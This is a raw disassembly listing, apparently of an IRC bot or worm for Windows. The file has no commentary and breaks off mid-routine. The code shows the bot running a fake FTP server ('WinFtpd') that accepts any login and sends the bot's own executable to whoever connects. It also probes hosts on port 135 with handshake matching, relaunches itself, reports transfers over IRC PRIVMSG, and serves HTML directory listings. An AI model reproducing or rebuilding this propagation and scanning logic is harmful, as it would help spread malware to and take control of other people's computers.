var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_434344
call dword_4335AC ; closesocket
call sub_41105B
call dword_4335B8 ; WSACleanup
call dword_4335B8 ; WSACleanup
mov ebx, ds:dword_41F000
push 64h
call ebx ; Sleep
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
push 11h
pop ecx
xor eax, eax
lea edi, [ebp+var_54]
rep stosd
mov esi, 104h
push esi
lea eax, [ebp+var_158]
xor edi, edi
push eax
mov [ebp+var_48], (offset asc_41FA74+2)
mov [ebp+var_54], 44h
mov [ebp+var_28], 1
mov [ebp+var_24], di
call ds:dword_41F040 ; GetSystemDirectoryA
push esi
lea eax, [ebp+var_25C]
push eax
push edi
call ds:dword_41F010 ; GetModuleFileNameA
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_158]
push eax
push edi
push 28h
push 1
push edi
push edi
lea eax, [ebp+var_25C]
push eax
push edi
call ds:dword_41F030 ; CreateProcessA
test eax, eax
jz short loc_402854
push 64h
call ebx ; Sleep
push [ebp+var_10]
mov esi, ds:dword_41F034
call esi ; CloseHandle
push [ebp+var_C]
call esi ; CloseHandle
loc_402854: ; CODE XREF: sub_402795+A9�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_432FEC
mov eax, [esp+2B8h+var_2B8]
mov large fs:0, eax
add esp, 8
push edi
call ds:dword_41F02C ; ExitProcess
int 3 ; Trap to Debugger
sub_402795 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402875 proc near ; CODE XREF: sub_4028A8+11C�p
; sub_4028A8+145�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov edx, [ebp+arg_4]
sub edx, [ebp+arg_C]
push ebx
push esi
xor eax, eax
test edx, edx
push edi
jle short loc_40289D
loc_402887: ; CODE XREF: sub_402875+26�j
mov esi, [ebp+arg_0]
mov ecx, [ebp+arg_C]
mov edi, [ebp+arg_8]
add esi, eax
xor ebx, ebx
repe cmpsb
jz short loc_4028A4
inc eax
cmp eax, edx
jl short loc_402887
loc_40289D: ; CODE XREF: sub_402875+10�j
xor al, al
loc_40289F: ; CODE XREF: sub_402875+31�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4028A4: ; CODE XREF: sub_402875+21�j
mov al, 1
jmp short loc_40289F
sub_402875 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028A8 proc near ; CODE XREF: .text:00412172�p
var_2010 = byte ptr -2010h
var_200E = byte ptr -200Eh
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call sub_412DD0
mov eax, [ebp+arg_4]
dec eax
jz short loc_4028E5
dec eax
jz short loc_4028C3
dec eax
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4028C3: ; CODE XREF: sub_4028A8+14�j
push 3
push 1388h
push [ebp+arg_0]
call dword_433514 ; inet_addr
push eax
call sub_4015FE
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
leave
retn
; ---------------------------------------------------------------------------
loc_4028E5: ; CODE XREF: sub_4028A8+11�j
push ebx
push esi
push 6
push 1
push 2
call dword_4334A0 ; socket
mov esi, eax
or ebx, 0FFFFFFFFh
xor eax, eax
cmp esi, ebx
mov [ebp+arg_4], esi
jz loc_402A0A
push edi
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
push 87h
mov [ebp+var_10], 2
call dword_4335EC ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_406B1D
pop ecx
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+var_10]
push eax
push esi
call dword_433458 ; connect
cmp eax, ebx
jz short loc_402954
xor edi, edi
push edi
push 48h
push offset dword_42A368
push esi
call dword_433534 ; send
cmp eax, ebx
jnz short loc_40295B
loc_402954: ; CODE XREF: sub_4028A8+95�j
; sub_4028A8+CC�j ...
xor esi, esi
jmp loc_4029FE
; ---------------------------------------------------------------------------
loc_40295B: ; CODE XREF: sub_4028A8+AA�j
push edi
mov esi, 2000h
push esi
lea eax, [ebp+var_2010]
push eax
push [ebp+arg_4]
call dword_433414 ; recv
cmp eax, ebx
jz short loc_402954
cmp [ebp+var_200E], 0Ch
jnz short loc_402954
push edi
push 18h
push offset dword_42A3B4
push [ebp+arg_4]
call dword_433534 ; send
cmp eax, ebx
jz short loc_402954
push edi
push esi
lea eax, [ebp+var_2010]
push eax
push [ebp+arg_4]
call dword_433414 ; recv
mov esi, eax
cmp esi, ebx
jz short loc_402954
cmp [ebp+var_200E], 2
jnz short loc_402954
push 10h
push offset loc_42A3D0
lea eax, [ebp+var_2010]
push esi
push eax
call sub_402875
add esp, 10h
test al, al
jz short loc_4029DE
xor eax, eax
cmp esi, 12Ch
setnl al
inc eax
jmp short loc_4029FC
; ---------------------------------------------------------------------------
loc_4029DE: ; CODE XREF: sub_4028A8+126�j
push 10h
push offset dword_42A3E4
lea eax, [ebp+var_2010]
push esi
push eax
call sub_402875
add esp, 10h
neg al
sbb eax, eax
and eax, 3
loc_4029FC: ; CODE XREF: sub_4028A8+134�j
mov esi, eax
loc_4029FE: ; CODE XREF: sub_4028A8+AE�j
push [ebp+arg_4]
call dword_4335AC ; closesocket
mov eax, esi
pop edi
loc_402A0A: ; CODE XREF: sub_4028A8+57�j
pop esi
pop ebx
leave
retn
sub_4028A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A0E proc near ; CODE XREF: sub_402B1D+4A2�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call ds:dword_41F1EC
push 0
push 1
push 2
call ds:dword_41F1F0
push [ebp+arg_0]
mov dword_432FF0, eax
mov [ebp+var_10], 2
call ds:dword_41F1F4
push [ebp+arg_4]
mov [ebp+var_C], eax
call ds:dword_41F204
mov [ebp+var_E], ax
push 10h
lea eax, [ebp+var_10]
push eax
push dword_432FF0
call ds:dword_41F1F8
cmp eax, 0FFFFFFFFh
jnz short loc_402A86
push dword_432FF0
call ds:dword_41F1FC
call ds:dword_41F200
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_402A86: ; CODE XREF: sub_402A0E+60�j
xor eax, eax
inc eax
leave
retn
sub_402A0E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A8B proc near ; CODE XREF: sub_402B1D+4AE�p
var_504 = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
push 104h
lea eax, [ebp+var_104]
push eax
push 0
call ds:dword_41F010 ; GetModuleFileNameA
lea eax, [ebp+var_104]
push offset dword_41F968
push eax
call sub_413393
mov esi, eax
test esi, esi
pop ecx
pop ecx
jnz short loc_402AF8
jmp short loc_402B1A
; ---------------------------------------------------------------------------
loc_402AC4: ; CODE XREF: sub_402A8B+72�j
push 400h
lea eax, [ebp+var_504]
push 1
push eax
call sub_41313E
add esp, 10h
push 0
push eax
lea eax, [ebp+var_504]
push eax
push dword_432FF0
call ds:dword_41F1E8
push 0Ah
call ds:dword_41F000 ; Sleep
loc_402AF8: ; CODE XREF: sub_402A8B+35�j
test byte ptr [esi+0Ch], 10h
push esi
jz short loc_402AC4
call sub_412F93
pop ecx
push dword_432FF0
call ds:dword_41F1FC
call ds:dword_41F200
xor eax, eax
inc eax
loc_402B1A: ; CODE XREF: sub_402A8B+37�j
pop esi
leave
retn
sub_402A8B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_402B1D proc near ; DATA XREF: sub_401141+254�o
var_A6C = byte ptr -0A6Ch
var_8DC = byte ptr -8DCh
var_6DC = dword ptr -6DCh
var_6D8 = byte ptr -6D8h
var_4C4 = byte ptr -4C4h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_438 = dword ptr -438h
var_334 = byte ptr -334h
var_2D0 = byte ptr -2D0h
var_29C = byte ptr -29Ch
var_238 = byte ptr -238h
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_124 = byte ptr -124h
var_F8 = byte ptr -0F8h
var_C4 = byte ptr -0C4h
var_AC = byte ptr -0ACh
var_48 = byte ptr -48h
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0A6Ch
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
xor ebx, ebx
inc ebx
mov ecx, 0A9h
lea edi, [ebp+74h+var_6DC]
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+74h+var_A6C]
push eax
xor esi, esi
push 101h
mov [ebp+74h+var_18], ebx
mov [ebp+74h+var_1C], ebx
mov [ebp+74h+var_228], esi
mov [ebp+74h+var_438], esi
call ds:dword_41F1EC
push esi
call sub_413820
push eax
call sub_412D64
mov eax, [ebp+74h+arg_0]
mov eax, [eax+214h]
pop ecx
pop ecx
push esi
push ebx
push 2
mov dword_432FF4, eax
call ds:dword_41F1F0
mov ebx, eax
push 4
lea eax, [ebp+74h+var_18]
push eax
push 4
push 0FFFFh
push ebx
mov [ebp+74h+var_8], ebx
call ds:dword_41F1C8
lea eax, [ebp+74h+var_1C]
push eax
push 8004667Eh
push ebx
call ds:dword_41F1CC
xor eax, eax
mov ax, word ptr dword_432FF4
mov [ebp+74h+var_38], 2
mov [ebp+74h+var_34], esi
push eax
call ds:dword_41F204
mov [ebp+74h+var_36], ax
push 10h
lea eax, [ebp+74h+var_38]
push eax
push ebx
call ds:dword_41F1D0
test eax, eax
jl loc_4030B7
push 0Ah
push ebx
call ds:dword_41F1D4
push 41h
pop ecx
xor eax, eax
push eax
push eax
push eax
lea eax, [ebp+74h+var_438]
mov [ebp+74h+var_224], ebx
mov [ebp+74h+var_4], ebx
push eax
inc ebx
lea esi, [ebp+74h+var_228]
lea edi, [ebp+74h+var_438]
mov [ebp+74h+var_228], 1
push ebx
rep movsd
call ds:dword_41F1D8
cmp eax, 0FFFFFFFFh
jz loc_4030B7
mov ebx, ds:dword_41F1E8
loc_402C3C: ; CODE XREF: sub_402B1D+594�j
xor esi, esi
cmp [ebp+74h+var_4], esi
mov [ebp+74h+arg_0], esi
jl loc_403086
loc_402C4A: ; CODE XREF: sub_402B1D+563�j
push 19h
pop ecx
xor eax, eax
push 19h
lea edi, [ebp+74h+var_29C]
rep stosd
pop ecx
lea edi, [ebp+74h+var_AC]
rep stosd
lea eax, [ebp+74h+var_438]
push eax
push esi
call sub_41E8A0
test eax, eax
jz loc_403079
cmp esi, [ebp+74h+var_8]
jnz short loc_402CE4
push 10h
pop edi
lea eax, [ebp+74h+var_24]
push eax
lea eax, [ebp+74h+var_238]
push eax
push [ebp+74h+var_8]
mov [ebp+74h+var_24], edi
call ds:dword_41F1E0
cmp eax, 0FFFFFFFFh
jz loc_403079
mov edx, [ebp+74h+var_228]
xor ecx, ecx
test edx, edx
jbe short loc_402CB6
loc_402CA8: ; CODE XREF: sub_402B1D+197�j
cmp [ebp+ecx*4+74h+var_224], eax
jz short loc_402CB6
inc ecx
cmp ecx, edx
jb short loc_402CA8
loc_402CB6: ; CODE XREF: sub_402B1D+189�j
; sub_402B1D+192�j
cmp ecx, edx
jnz short loc_402CCC
cmp edx, 40h
jnb short loc_402CCC
mov [ebp+ecx*4+74h+var_224], eax
inc [ebp+74h+var_228]
loc_402CCC: ; CODE XREF: sub_402B1D+19B�j
; sub_402B1D+1A0�j
cmp eax, [ebp+74h+var_4]
jle short loc_402CD4
mov [ebp+74h+var_4], eax
loc_402CD4: ; CODE XREF: sub_402B1D+1B2�j
push 0
push edi
push offset a220Winftpd1_2 ; "220 WinFtpd 1.2\n"
push eax
call ebx
jmp loc_403079
; ---------------------------------------------------------------------------
loc_402CE4: ; CODE XREF: sub_402B1D+15A�j
push 0
push 64h
lea eax, [ebp+74h+var_29C]
push eax
push esi
call ds:dword_41F1E4
test eax, eax
jg short loc_402D42
mov ecx, [ebp+74h+var_228]
xor eax, eax
test ecx, ecx
jbe short loc_402D36
loc_402D06: ; CODE XREF: sub_402B1D+1F5�j
cmp [ebp+eax*4+74h+var_224], esi
jz short loc_402D2B
inc eax
cmp eax, ecx
jb short loc_402D06
jmp short loc_402D36
; ---------------------------------------------------------------------------
loc_402D16: ; CODE XREF: sub_402B1D+211�j
mov ecx, [ebp+eax*4+74h+var_220]
mov [ebp+eax*4+74h+var_224], ecx
mov ecx, [ebp+74h+var_228]
inc eax
loc_402D2B: ; CODE XREF: sub_402B1D+1F0�j
dec ecx
cmp eax, ecx
jb short loc_402D16
dec [ebp+74h+var_228]
loc_402D36: ; CODE XREF: sub_402B1D+1E7�j
; sub_402B1D+1F7�j
push esi
call ds:dword_41F1FC
jmp loc_403079
; ---------------------------------------------------------------------------
loc_402D42: ; CODE XREF: sub_402B1D+1DB�j
lea eax, [ebp+74h+var_334]
push eax
lea eax, [ebp+74h+var_AC]
push eax
lea eax, [ebp+74h+var_29C]
push offset aSS_0 ; "%s %s"
push eax
call sub_412D93
add esp, 10h
push 5
pop edx
mov edi, offset aUser_0 ; "USER"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_402D81
push eax
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402D81: ; CODE XREF: sub_402B1D+255�j
mov edi, offset aPass ; "PASS"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_402D9E
push eax
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402D9E: ; CODE XREF: sub_402B1D+272�j
mov edi, offset aSyst ; "SYST"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_402DBB
push eax
push 0Dh
push offset a215Stnyftpd ; "215 StnyFtpd\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402DBB: ; CODE XREF: sub_402B1D+28F�j
mov edi, offset aRest ; "REST"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_402DD8
push eax
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402DD8: ; CODE XREF: sub_402B1D+2AC�j
push 4
mov edi, offset off_41FE14
lea esi, [ebp+74h+var_AC]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_402DF6
push eax
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402DF6: ; CODE XREF: sub_402B1D+2CA�j
mov eax, offset aType ; "TYPE"
mov ecx, edx
mov edi, eax
lea esi, [ebp+74h+var_AC]
xor edx, edx
repe cmpsb
jnz short loc_402E29
push 2
mov edi, offset aA_0 ; "A"
lea esi, [ebp+74h+var_334]
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_402E29
push edx
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402E29: ; CODE XREF: sub_402B1D+2E9�j
; sub_402B1D+2FD�j
mov edi, eax
push 5
pop eax
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz short loc_402E5A
push 2
mov edi, offset aI ; "I"
lea esi, [ebp+74h+var_334]
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_402E5A
push edx
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402E5A: ; CODE XREF: sub_402B1D+31A�j
; sub_402B1D+32E�j
mov edi, offset aPasv ; "PASV"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz short loc_402E99
push 0Ah
pop ecx
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
lea edi, [ebp+74h+var_124]
rep movsd
lea eax, [ebp+74h+var_124]
movsw
lea edx, [eax+1]
loc_402E85: ; CODE XREF: sub_402B1D+36D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402E85
sub eax, edx
push 0
push eax
lea eax, [ebp+74h+var_124]
jmp short loc_402ECD
; ---------------------------------------------------------------------------
loc_402E99: ; CODE XREF: sub_402B1D+34B�j
mov edi, offset aList ; "LIST"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
mov ecx, eax
jnz short loc_402ED3
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
lea edi, [ebp+74h+var_C4]
rep movsd
movsw
lea eax, [ebp+74h+var_C4]
movsb
lea edx, [eax+1]
loc_402EBE: ; CODE XREF: sub_402B1D+3A6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402EBE
sub eax, edx
push 0
push eax
lea eax, [ebp+74h+var_C4]
loc_402ECD: ; CODE XREF: sub_402B1D+37A�j
push eax
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402ED3: ; CODE XREF: sub_402B1D+38C�j
mov edi, offset aPort ; "PORT"
lea esi, [ebp+74h+var_AC]
xor edx, edx
repe cmpsb
jnz loc_402F97
lea eax, [ebp+74h+var_2D0]
push eax
lea eax, [ebp+74h+var_F8]
push eax
lea eax, [ebp+74h+var_28]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_14]
push eax
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_29C]
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_412D93
lea eax, [ebp+74h+var_F8]
push eax
call sub_412F42
mov esi, eax
lea eax, [ebp+74h+var_2D0]
push eax
call sub_412F42
push 0Ch
mov edx, eax
pop ecx
xor eax, eax
lea edi, [ebp+74h+var_F8]
rep stosd
push edx
push esi
stosw
lea eax, [ebp+74h+var_F8]
push offset aXX ; "%x%x\n"
push eax
call sub_412BB5
push 10h
lea eax, [ebp+74h+var_F8]
push 0
push eax
call sub_413809
mov [ebp+74h+var_10], eax
add esp, 44h
lea eax, [ebp+74h+var_28]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_14]
push eax
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_48]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_412BB5
add esp, 18h
push 0
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402F97: ; CODE XREF: sub_402B1D+3C2�j
mov edi, offset aRetr ; "RETR"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz loc_40304C
push edx
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push [ebp+74h+arg_0]
call ebx
push [ebp+74h+var_10]
lea eax, [ebp+74h+var_48]
push eax
call sub_402A0E
cmp eax, 1
pop ecx
pop ecx
jnz short loc_403041
call sub_402A8B
cmp eax, 1
jnz loc_403069
xor esi, esi
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push [ebp+74h+arg_0]
call ebx
lea eax, [ebp+74h+var_6D8]
push eax
lea eax, [ebp+74h+var_48]
push eax
lea eax, [ebp+74h+var_8DC]
push offset aFtpFileTransfe ; "[FTP]: File transfer complete to IP: %s"...
push eax
call sub_412BB5
add esp, 10h
cmp [ebp+74h+var_440], esi
jnz short loc_403032
push esi
push [ebp+74h+var_444]
lea eax, [ebp+74h+var_8DC]
push eax
lea eax, [ebp+74h+var_4C4]
push eax
push [ebp+74h+var_6DC]
call sub_4045DD
add esp, 14h
loc_403032: ; CODE XREF: sub_402B1D+4F0�j
lea eax, [ebp+74h+var_8DC]
push eax
call sub_401C33
pop ecx
jmp short loc_403069
; ---------------------------------------------------------------------------
loc_403041: ; CODE XREF: sub_402B1D+4AC�j
push 0
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_403064
; ---------------------------------------------------------------------------
loc_40304C: ; CODE XREF: sub_402B1D+488�j
mov ecx, eax
mov edi, offset aQuit ; "QUIT"
lea esi, [ebp+74h+var_AC]
xor eax, eax
repe cmpsb
jnz short loc_403069
push eax
push 0Dh
push offset a221Goodbye_ ; "221 Goodbye.\n"
loc_403064: ; CODE XREF: sub_402B1D+25F�j
; sub_402B1D+27C�j ...
push [ebp+74h+arg_0]
call ebx
loc_403069: ; CODE XREF: sub_402B1D+4B6�j
; sub_402B1D+522�j ...
mov esi, [ebp+74h+arg_0]
push 19h
pop ecx
xor eax, eax
lea edi, [ebp+74h+var_29C]
rep stosd
loc_403079: ; CODE XREF: sub_402B1D+151�j
; sub_402B1D+179�j ...
inc esi
cmp esi, [ebp+74h+var_4]
mov [ebp+74h+arg_0], esi
jle loc_402C4A
loc_403086: ; CODE XREF: sub_402B1D+127�j
push 41h
pop ecx
xor eax, eax
push eax
push eax
push eax
lea eax, [ebp+74h+var_438]
push eax
mov eax, [ebp+74h+var_4]
inc eax
lea esi, [ebp+74h+var_228]
lea edi, [ebp+74h+var_438]
push eax
rep movsd
call ds:dword_41F1D8
cmp eax, 0FFFFFFFFh
jnz loc_402C3C
loc_4030B7: ; CODE XREF: sub_402B1D+C9�j
; sub_402B1D+113�j
pop edi
xor eax, eax
pop esi
inc eax
pop ebx
add ebp, 74h
leave
retn 4
sub_402B1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4030C4 proc near ; CODE XREF: sub_4039DE+149�p
; sub_4078FA+355D�p
var_598 = byte ptr -598h
var_494 = byte ptr -494h
var_38C = dword ptr -38Ch
var_378 = byte ptr -378h
var_36C = dword ptr -36Ch
var_360 = byte ptr -360h
var_24C = byte ptr -24Ch
var_4C = byte ptr -4Ch
var_24 = byte ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 598h
push ebx
push esi
push edi
push 41h
pop ecx
xor eax, eax
lea edi, [ebp+var_598]
rep stosd
mov edi, [ebp+arg_0]
xor ebx, ebx
push offset asc_420328 ; "\n"
push edi
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_413859
cmp [ebp+arg_8], ebx
pop ecx
pop ecx
jz short loc_40311D
push edi
push [ebp+arg_8]
mov esi, 200h
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
add esp, 14h
jmp loc_40323A
; ---------------------------------------------------------------------------
loc_40311D: ; CODE XREF: sub_4030C4+34�j
cmp [ebp+arg_C], ebx
jz loc_40321F
mov eax, edi
lea ecx, [eax+1]
loc_40312B: ; CODE XREF: sub_4030C4+6C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40312B
push edi
sub eax, ecx
and [eax+edi-1], dl
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
mov esi, 200h
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 10h
lea ecx, [eax+1]
loc_40315C: ; CODE XREF: sub_4030C4+9D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40315C
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534 ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 10h
lea ecx, [eax+1]
loc_403196: ; CODE XREF: sub_4030C4+D7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_403196
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534 ; send
mov eax, edi
lea ecx, [eax+1]
loc_4031B6: ; CODE XREF: sub_4030C4+F7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4031B6
push 3Ch
push 96h
push 0E6h
sub eax, ecx
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
mov byte ptr [eax+edi], 2Ah
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 18h
lea ecx, [eax+1]
loc_4031ED: ; CODE XREF: sub_4030C4+12E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4031ED
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534 ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
add esp, 0Ch
jmp short loc_40323A
; ---------------------------------------------------------------------------
loc_40321F: ; CODE XREF: sub_4030C4+5C�j
push edi
push offset aSearchingForS ; "Searching for: %s\r\n"
mov esi, 200h
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
add esp, 10h
loc_40323A: ; CODE XREF: sub_4030C4+54�j
; sub_4030C4+159�j
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_403243: ; CODE XREF: sub_4030C4+184�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403243
push ebx
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534 ; send
mov eax, [ebp+arg_C]
cmp eax, ebx
jz loc_4032ED
lea edx, [eax+1]
loc_40326C: ; CODE XREF: sub_4030C4+1AD�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40326C
sub eax, edx
cmp eax, 2
jbe short loc_4032ED
mov eax, [ebp+arg_C]
lea edx, [eax+1]
loc_403280: ; CODE XREF: sub_4030C4+1C1�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403280
sub eax, edx
add eax, 0FFFFFFFDh
cmp eax, ebx
jz short loc_40329C
loc_403290: ; CODE XREF: sub_4030C4+1D6�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_40329C
dec eax
jnz short loc_403290
loc_40329C: ; CODE XREF: sub_4030C4+1CA�j
; sub_4030C4+1D3�j
inc eax
push eax
push [ebp+arg_C]
lea eax, [ebp+var_598]
push eax
call sub_412C40
lea eax, [ebp+var_598]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 1Ch
lea ecx, [eax+1]
loc_4032D2: ; CODE XREF: sub_4030C4+213�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4032D2
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534 ; send
loc_4032ED: ; CODE XREF: sub_4030C4+19F�j
; sub_4030C4+1B4�j
lea eax, [ebp+var_38C]
push eax
push edi
call ds:dword_41F054 ; FindFirstFileA
lea ecx, [ebp+var_38C]
push ecx
push eax
mov [ebp+var_C], eax
call ds:dword_41F050 ; FindNextFileA
test eax, eax
jz loc_40371A
mov ebx, 1FFh
loc_403319: ; CODE XREF: sub_4030C4+650�j
cmp [ebp+var_38C], 0
jz loc_403702
push 3
mov edi, offset a__ ; ".."
lea esi, [ebp+var_360]
pop ecx
xor eax, eax
repe cmpsb
jz loc_403702
push 2
mov edi, offset a__0 ; "."
lea esi, [ebp+var_360]
pop ecx
xor eax, eax
repe cmpsb
jz loc_403702
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_378]
push eax
call ds:dword_41F04C ; FileTimeToLocalFileTime
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_24]
push eax
call ds:dword_41F048 ; FileTimeToSystemTime
mov ax, [ebp+var_14]
cmp ax, 0Ch
mov ecx, offset aPm ; "PM"
ja loc_403417
mov ecx, offset aAm ; "AM"
movzx eax, ax
loc_403390: ; CODE XREF: sub_4030C4+359�j
push ecx
movzx ecx, [ebp+var_12]
push ecx
push eax
movzx eax, [ebp+var_1C]
push eax
movzx eax, [ebp+var_16]
push eax
movzx eax, [ebp+var_1A]
push eax
lea eax, [ebp+var_4C]
